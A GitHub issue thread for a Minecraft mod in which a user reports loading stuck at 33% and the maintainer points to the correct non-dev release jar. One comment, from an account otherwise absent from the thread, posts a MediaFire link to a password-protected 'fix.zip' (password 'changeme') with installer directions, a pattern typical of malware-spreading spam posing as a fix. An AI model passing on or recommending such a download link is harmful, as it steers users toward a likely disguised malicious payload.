### ISSUE TITLE
加载卡在33% Iguana Tinker Tweaks

### ISSUE THREAD

**Issue by Konpakiyuin** [reobf/Programmable-Hatches-Mod#58]
[crash-2024-08-28_12.42.12-client.txt](https://github.com/user-attachments/files/16776425/crash-2024-08-28_12.42.12-client.txt)
尝试从15P5升级时出现，从17末版到最新版都不行。都是卡在这里。

**Comment by reobf** [comment]
> [crash-2024-08-28_12.42.12-client.txt](https://github.com/user-attachments/files/16776425/crash-2024-08-28_12.42.12-client.txt) 尝试从15P5升级时出现，从17末版到最新版都不行。都是卡在这里。

请使用不带dev后缀的jar文件，那个是给给开发环境用的版本
https://github.com/reobf/Programmable-Hatches-Mod/releases/download/v0.0.18p14-beta/programmablehatches-0.0.18p14.jar

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Konpakiyuin** [comment]
好的，谢谢
